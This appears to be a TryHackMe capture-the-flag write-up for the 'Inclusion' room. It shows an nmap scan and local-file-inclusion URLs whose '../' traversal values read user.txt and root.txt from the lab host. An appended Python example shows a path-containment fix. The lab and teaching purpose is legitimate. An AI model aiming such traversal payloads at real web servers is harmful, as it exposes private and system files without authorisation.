Inclusion

A beginner level LFI challenge

TryHackMe - Inclusion Created by falconfeast

Scanning (IP : 10.10.242.102)

NMAP

> nmap -sC -sV 10.10.242.102 > nmap.txt

Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-09 06:20 EDT
Nmap scan report for 10.10.209.219
Host is up (0.19s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e6:3a:2e:37:2b:35:fb:47:ca:90:30:d2:14:1c:6c:50 (RSA)
|   256 73:1d:17:93:80:31:4f:8a:d5:71:cb:ba:70:63:38:04 (ECDSA)
|_  256 d3:52:31:e8:78:1b:a6:84:db:9b:23:86:f0:1f:31:2a (ED25519)
80/tcp open  http    Werkzeug httpd 0.16.0 (Python 3.6.9)
|_http-server-header: Werkzeug/0.16.0 Python/3.6.9
|_http-title: My blog
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 33.85 seconds

LFI parameter

At the URL http://10.10.242.102/article?name=<FUZZ>, you can view any existing file on the server by changing the value of the name parameter.

The "© falconfeast 2020" notice hints that the username is falconfeast.

user.txt : http://10.10.242.102/article?name=../../../../../home/falconfeast/user.txt

root.txt : http://10.10.242.102/article?name=../../../../../root/root.txt
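The fix for this class of bug, as an added example that is not part of the original write-up or the challenge's own code: the naive path join that lets the name parameter leave the article directory, next to a lookup that resolves the path and rejects anything outside it. The function names, directory layout and file names are assumptions constructed for the demonstration.

```python
import os
import tempfile
from pathlib import Path


def resolve_unsafe(base_dir, name):
    # Vulnerable pattern: the request value is joined to the base directory
    # unchanged, so "../" sequences (or an absolute path) leave it.
    return os.path.normpath(os.path.join(str(base_dir), name))


def resolve_safe(base_dir, name):
    """Return the file's path only if it resolves inside base_dir, else None."""
    base = Path(base_dir).resolve()
    candidate = (base / name).resolve()  # collapses ".." and follows symlinks
    try:
        candidate.relative_to(base)      # raises ValueError when outside base
    except ValueError:
        return None
    return candidate if candidate.is_file() else None


def demo():
    """Map each request value to (unsafe join escapes, safe lookup allowed)."""
    requests = [
        "hacking",                                    # constructed article name
        "../secret.txt",                              # one level up
        "../../../../../home/falconfeast/user.txt",   # value used in the write-up
    ]
    results = {}
    with tempfile.TemporaryDirectory() as root:
        articles = Path(root) / "articles"            # constructed layout
        articles.mkdir()
        (articles / "hacking").write_text("article body")
        (Path(root) / "secret.txt").write_text("not an article")
        requests.append(str(Path(root) / "secret.txt"))  # absolute path
        for name in requests:
            unsafe = resolve_unsafe(articles, name)
            escapes = os.path.commonpath([str(articles), unsafe]) != str(articles)
            results[name] = (escapes, resolve_safe(articles, name) is not None)
    return results


if __name__ == "__main__":
    for name, (escapes, allowed) in demo().items():
        print(f"{name!r}: unsafe join escapes={escapes}, safe lookup allowed={allowed}")
```

The containment check runs on the resolved path rather than on the raw string, so it also covers absolute paths and symlinks that point outside the article directory.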
